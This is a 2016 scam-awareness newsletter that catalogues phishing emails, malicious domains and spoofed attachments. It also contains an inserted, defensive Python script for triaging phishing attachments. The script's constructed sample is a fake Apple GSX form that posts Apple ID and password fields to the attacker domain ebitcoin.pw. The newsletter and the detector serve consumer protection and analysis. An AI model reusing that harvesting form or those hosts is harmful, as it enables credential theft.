
March 30, 2016

THE WEEK IN REVIEW

A funny thing happened during the last week in scamland. Some criminal mastermind from one of the major scam gangs came up with a new idea and liked it so much that he used it in the subject lines of thousands of scams we saw. This mastermind decided that he wants to give us choices! Look at this week’s subject lines below, lifted from sample scam emails seen during the last week, to see what we mean. It was funny to see so many of these.

Also, just a reminder that it is still tax season and we continue to see a lot of tax scam emails, such as this one with the subject line “Online Tax Preparation.” The text in the email is very slick and well written. The bogus U.S. Treasury and IRS phone calls targeting Americans are also still very popular. We found this article on ABCNews.com about a smartphone app capable of identifying incoming calls from known tax scam phone numbers and blocking them immediately. We have no idea how effective it is, but it sure seems like a great idea! Check it out.


Sample Scam Subject Lines:

Check out Top 10 Listings for Identity Theft Today

Compare Top 12 options for Francise Business

Compare Top 13 Listings for Wireless Internet Today

Compare Top 14 Options in Substance Abuse

Compare upto Top 18 Options for Dui Lawyers

Explore Top 10 Options in Remodel Kitchen

Explore Up-To Top 19 Cosmetic Dentistry Listings

Search Top 15 Options in Thyroid Treatment

Search Top 16 Personal Injury lawyers Listings

Search top 19 Listings for Alaska Cruises Today

Search Up-To Top 11 Cholesterol Management Listings

View Top 16 Options in Vision Correction

View Top 19 Options in Retirement Planning

Sample Scam Email Addresses:

+=+CarInsurance+=+@beinging.top

-AttorneyLegalHelp-@thanity.top

Amazon-Prime-Bonus@djien.ntemper.top

Checking_Account@kotoju.top

CreditCardProcessing@greatedly.download

GrandCanyonAdventures@polyhs.download

hummingbirdvineoffer@humvin.download

LastMinuteTaxPreparation@histoidit.download

matchcom-[YOUR EMAIL]@ventmill.com

PopularDogFoodProducts@cartwheelml.download

TaxPreparation@histoidit.download

TradeshowBusinessTools@prenuous.download

WirelessSecurityCameras@lagmeo.download


Phish NETS: Apple Phish Hiding Ransomware Link?

Have you heard of ransomware? It is a particularly nasty piece of malware that, once initiated, quickly encrypts all your personal files so they cannot be opened unless you have the encryption key. The criminals who trick you into installing ransomware on either Apple or Windows computers are happy to sell you that key. Prices range from as low as $300 to as much as $2000 and are most often paid in the untraceable Internet currency called bitcoin, which brings us to this week’s phishing scam.

We found yet another phishing scam pretending to be an Apple GSX email “notification alert.” But rather than a malicious link, this email contained a very dangerous attached shtml file:


We have written about the risks of opening web files such as html or htm files. (Check out our article called Filenames Will Set You Free!) However, the shtml file is even more dangerous because this type of file allows for “server side includes.” In other words, an shtml file contains directives that a web server executes when the file is served, even as you are viewing it. In the hands of a criminal, an shtml file is capable of doing serious harm to a person’s local computer by employing the processing power of a server to inflict damage. At first we thought this email was just another plain old phishing scam. However, we cracked open the file, and when we looked at the code we found this precious snippet:

[Image: GSX Apple phish bitcoin code]

The personal data being collected by the shtml file is posted to a website in Palau (2-letter country code = .pw) called ebitcoin.pw. Palau is an archipelago of more than 500 islands, part of the Micronesia region in the western Pacific Ocean. We found this particularly interesting because of the recent popular association between bitcoins and ransomware. (Check out this article on the Bitcoin News Service titled What Came First, Bitcoin or Ransomware? (March 25, 2016).) We wondered if this shtml file, with directives issued by a server and a link to a site named for bitcoins, was in fact triggering malicious encryption if opened on a personal computer. Of course we didn’t want to risk viewing the shtml file in real time, so we can’t be certain.

Also, the domain ebitcoin.pw was registered on March 17 by Dumitru Bogdan through Namecheap.com. What makes this even more curious is that legitimate bitcoin sites can be found at bitcoin.org and bitcoin.com, not ebitcoin.pw.

Delete fast.

Your Money: Affordable Movers, Bathroom Renovation, and Travel to Alaska

This next email, “Affordable Movers at Your Service,” was sent from Movers@clickonthis.pro. The domain “clickonthis.pro” was registered on March 16 using Alpnames to the company called Digital Technical. Our loyal readers will recognize this bogus company because we’ve written about it in several past newsletters: February 24 (http://www.thedailyscam.com/february-24-2016/), March 2 (http://www.thedailyscam.com/march-2-2016/), and March 9 (http://www.thedailyscam.com/march-9-2016/).

Just delete!

[Image: Affordable movers at your service]

Thinking about renovating a bathroom and interested in some bathroom renovation resources? Need some ideas for stylish and affordable bathroom renovations? This email will hurt a lot more than it will help. This email’s style looks like so many of the scam emails we report on. There are many ways to investigate this one, but all you need to do is look at the unsubscribe link after the graphic. Look familiar? “Lemon Juice” in Houston, TX? The scammers use this bogus company a lot. When we searched Google for this company along with its address, we got 140 links to scam/spam messages from around the Internet. Check out Google’s returns.

[Image: Bathroom renovation resources]

Is your family thinking about travel plans? How about Alaska? According to this email you can “find amazing Alaska cruises” through their link to alaskatrip.pro. And of course it’s another scam from the same criminal gang that sent the other two emails described above. Look at the address in the “unsubscribe here” link under the graphic. Our longtime readers should also recognize the company listed at the bottom of the email. Futurebright Solutions from Grandville, Michigan is another bogus company often used by these criminals to legitimize their scams. We’ve reported on Futurebright Solutions many times, most recently in our newsletter from January 27.

[Image: Travel to Alaska]


TOP STORY: Shared a PDF on Google Drive

This week’s top story is about another dangerous example of social engineering. What makes this so dangerous is that the email came from a user’s hacked account and was sent to everyone in their contact list. Would you have clicked the link if you had received this email from a friend’s account that you recognize?

“So-and-so shared the following PDF: Docup8date1370515.pdf.” Supposedly this pdf file is shared with you on Google Drive. Except it’s a lie. A mouse-over of both the “Open” button and the pdf link shows that they point to a file on the webserver compuvellsadecv.com.

Compuvellsadecv.com? This is certainly not Google, but is it safe to check out? We asked both Virustotal.com and the Zulu URL Risk Analyzer to check this link. Their responses were crystal clear:


[Image: Shared a PDF on Google Drive (3)]

In fact, Zulu found 7 malicious links waiting for you at the website compuvellsadecv.com. This is a definite delete! We say it over and over: mousing over a link to see where it leads BEFORE clicking is one of the most important skills people need to stay safe. We have many links on TheDailyScam.com that teach folks how to mouse over.

[Image: Shared a PDF on Google Drive (4)]
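As an added example (not code from this newsletter or from any of the tools it mentions), the following Python script does in code the two checks the Apple GSX story and this Google Drive story call for: it scans an HTML or SHTML attachment for server-side-include directives, lists where any form posts the data it collects, and compares each link's visible text with the host its href actually reaches, which is the mouse-over check automated. The sample attachment and lure body are constructed for illustration and reuse only the hosts named in the two stories (ebitcoin.pw and compuvellsadecv.com); the list of domains a message is trusted to post or link to (apple.com for a GSX notice, google.com for a Drive share) is an assumption you supply for each message.

```python
"""Triage helper for phishing attachments and lure links (added example).

Flags Apache-style server-side-include directives in an SHTML attachment,
forms that post off-site, and links whose href host is not one of the
domains the message claims to come from."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# SSI directives look like <!--#include virtual="..." --> or <!--#exec cmd="..." -->.
SSI_RE = re.compile(r"<!--\s*#\s*(include|exec|echo|config|set|fsize|flastmod)\b", re.I)


class LinkExtractor(HTMLParser):
    """Collect <form action> targets and (href, visible text) pairs for <a> tags."""

    def __init__(self):
        super().__init__()
        self.forms = []   # action URLs of every <form>
        self.links = []   # (href, visible text) of every <a>
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.forms.append(a["action"])
        elif tag == "a":
            self._href = a.get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:          # text inside an open <a>
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            text = " ".join("".join(self._text).split())
            self.links.append((self._href, text))
            self._href = None


def host_of(url):
    """Lower-cased hostname of an absolute URL; '' for relative or non-URL values."""
    return (urlparse(url.strip()).hostname or "").lower()


def is_trusted(host, trusted_domains):
    """True if host is one of the trusted domains or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in trusted_domains)


def analyze(html, trusted_domains):
    """Return (kind, detail) findings for an HTML/SHTML body.

    kinds: 'ssi_directive' (raw directive), 'form_posts_offsite' (host),
    'link_offsite' ((visible text, host)). trusted_domains is the list of
    domains the message claims to come from (assumed input, e.g. ['apple.com'])."""
    findings = [("ssi_directive", m.group(0)) for m in SSI_RE.finditer(html)]
    parser = LinkExtractor()
    parser.feed(html)
    parser.close()
    for action in parser.forms:
        host = host_of(action)
        if host and not is_trusted(host, trusted_domains):
            findings.append(("form_posts_offsite", host))
    for href, text in parser.links:
        host = host_of(href)
        if host and not is_trusted(host, trusted_domains):
            findings.append(("link_offsite", (text, host)))
    return findings


# Constructed sample of an SHTML phishing attachment (not the real GSX file).
GSX_SAMPLE = """<!--#include virtual="/cgi-bin/counter.pl" -->
<html><body><h2>Apple GSX Notification</h2>
<form method="post" action="http://ebitcoin.pw/collect.php">
<input name="apple_id"><input name="password" type="password"><input type="submit">
</form></body></html>"""

# Constructed sample of the Google Drive lure body (not the real email).
DRIVE_SAMPLE = """<html><body><p>So-and-so shared the following PDF:</p>
<a href="http://compuvellsadecv.com/x/Docup8date1370515.pdf">Docup8date1370515.pdf</a>
<a href="http://compuvellsadecv.com/x/open">Open</a>
<a href="https://support.google.com/drive">Google Drive help</a>
</body></html>"""

if __name__ == "__main__":
    for label, body, trusted in (("GSX attachment", GSX_SAMPLE, ["apple.com"]),
                                 ("Drive lure", DRIVE_SAMPLE, ["google.com"])):
        print(label)
        for kind, detail in analyze(body, trusted):
            print("  ", kind, detail)
```

The SSI scan runs on the raw text rather than the parsed tree because a browser treats `<!--#include ... -->` as an ordinary comment; only a server that has SSI enabled acts on it, so an offline viewer would never see the directive fire. The link check reports the visible text next to the real host so an analyst sees at a glance that "Open" leads to compuvellsadecv.com rather than to Google.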


FOR YOUR SAFETY: Image PDF, Fax Transmission, and Invoice Statement

Is it a pdf? Or an image? Or a pdf file of an image? Whatever it claims to be, these emails all come with an attached zip file, and of course the file is malicious. Here’s a sample, and below you’ll see a screenshot showing many such emails targeting one email server. We’ve obscured the “from” addresses as well as the “to” addresses because the emails were spoofed so that they appeared to be sent from the same person who received the email. This trick is a well-practiced form of social engineering meant to engage your curiosity. Why does this email come from me? What is this? CLICK.


[Image: Image pdf, list of emails]

Expecting a fax? “Please find attached to this email a facsimile transmission we have just received on your behalf.” Yeah, right.

Delete!


“Please find attached the statement (S#516105) that matches back to your invoices. Can you please sign and return.” Except that the zip file is malicious. And we all say… deeeleete!

[Image: Fax transmission]

What do these next 3 scams have in common? Look closely… And then check out what the Zulu URL Risk Analyzer has to say about what they all have in common!


[Image (397com): Call your bank immediately]


[Image (397com): Your download link, Elite Profits Trader]


ON THE LIGHTER SIDE: Excessive Sweating

Imagine having to do a presentation for your boss and a whole group of executives. Can you feel the pressure? Are you starting to sweat? Thank goodness for this product. It’s certainly original!

[Image: Stop excessive sweating]


Until next week, surf safely!